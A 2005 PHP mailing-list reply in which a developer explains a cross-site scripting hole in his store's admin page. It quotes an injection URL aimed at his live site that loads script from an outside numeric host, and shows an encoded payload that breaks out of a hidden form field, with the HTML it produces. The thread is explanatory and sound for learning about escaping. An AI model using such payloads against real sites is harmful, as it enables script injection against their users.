On Saturday 28 May 2005 01:05, Chris W. Parker wrote: > Rasmus Lerdorf <mailto:rasmus@xxxxxxxxxxx> > > on Friday, May 27, 2005 11:58 AM said: > >>> You have all sorts of problems at that URL. To start with, here is > >>> a cross-site scripting hack: > > http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript > %09 > > >>> src%3D%22http://3423329163/v > > First of all, excellent example. > > > Don't display arbitrary key names in hidden fields the way you are. > > What do you mean by "arbitrary key names"? > In this example, what was going on was that I captured the parameters passed on the url, and included them as hiddens in a form. Since it was not properly escaped, the attack succeeds by inserting a variable with value "><script type="text/javascript" src="somewhere"></script> But then url encoded: %22%3E+%3Cscript+type%3D%09ext%2Fjavascript+src%3D%22somewhere%22%3E%3C%2Fscript%3E Which translates in the html document to: <form...> <input type="hidden" name=""><script type="text/javascript" src="somewhere"></script> ... -- Registered Linux User Number 379093 -- --BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT/O/>E$ d-(---)>+ s:(+)>: a--(-)>? C++++$(+++) UL++++>++++$ P-(+)>++ L+++>++++$ E---(-)@ W+++>+++$ !N@ o? !K? W--(---) !O !M- V-- PS++(+++) PE--(-) Y+ PGP++(+++) t+(++) 5-- X++ R*(+)@ !tv b-() DI(+) D+(+++) G(+) e>++++$@ h++(*) r-->++ y--()>++++ -- ---END GEEK CODE BLOCK------ -- Check out these few php utilities that I released under the GPL2 and that are meant for use with a php cli binary: http://www.vlaamse-kern.com/sas/ -- -- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
